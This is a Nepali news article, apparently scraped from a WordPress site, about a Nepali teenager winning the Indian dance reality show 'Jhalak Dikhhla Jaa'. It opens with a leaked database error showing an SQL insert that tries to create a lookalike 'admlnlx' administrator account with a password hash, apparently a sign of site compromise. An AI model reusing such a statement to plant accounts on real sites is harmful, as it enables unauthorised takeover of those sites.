WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bke4wnFLXuF8svirmcJvK29jLP.O0h.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 17:40:38', '', 'admlnlx', 'admlnlx')
चितवन, माघ ७–
एकपछि अर्को गर्दै नेपाली किशोरी तेरिया फौजा मगरले भारतीय सिनियर डान्स स्टारबीचको ठूलो प्रतिस्पर्धा ‘झलक दिखला जा’ को रियालीटी शो को उपाधि जितेकी छिन् ।
रुपन्देही रुद्रपुरकी १४ वर्षे तेरियाले भारतीय टिभी कलर्सको ‘झलक दिखला जा’ को रियालीटी शो को उपाधि जितेकी हुन् । फाइनलमा नृत्यसंगै एसएमएस भोटद्धारा उनी विजेता छानिएको हो । एसएमएसमा सबै प्रतिस्पर्धीलाई पछि पार्दै उनी ट्रफीको हकदार बनेकी हुन् । तेरियाको औपचारिक जीतको घोषणा भने शनिबार राति १० बजेपछि कलर्स टिभिमार्फत गरिनेछ । तर, शुक्रबार अपरान्ह नै एसएमएस भोटको नतिजा निस्केको र आयोजकले उपाधि जीतेको औपचारिक जानाकारी आफुलाई गराएको मुम्मईमा रहेकी तेरियाले हजुरबुबा कृष्ण फौजामगरलाई फोनमार्फत जानाकारी दिएकी छिन् । तेरियालाई जिताउन ‘तेरिया जीताऔं अभियान’ चलाइएको थियो ।
डान्स प्रतियोगिता विजेताहरु बीच प्रतिस्पर्धा गराउने ‘झलक दिखला जा’ भारतीय टिभी शोमा सर्वाधिक पुरस्कार राशीको हो । जीतसंगै तेरियाले ३० लाख भारतीय रुपैयाँ र रेनाल्ड डस्टर ब्राण्डको कार उपहार पाउने छिन् । सन् २०१४ को जी टिभिको ‘डिआइडीमा’ ४० हजार प्रतिस्पर्धीलाई पछाडि पारेकी तेरिया डिआइडी विजेताको तर्फबाट यसमा प्रवेश पाएकी हुन् । गत जुलाईमा प्रतियोगिता सुरु भएको थियो ।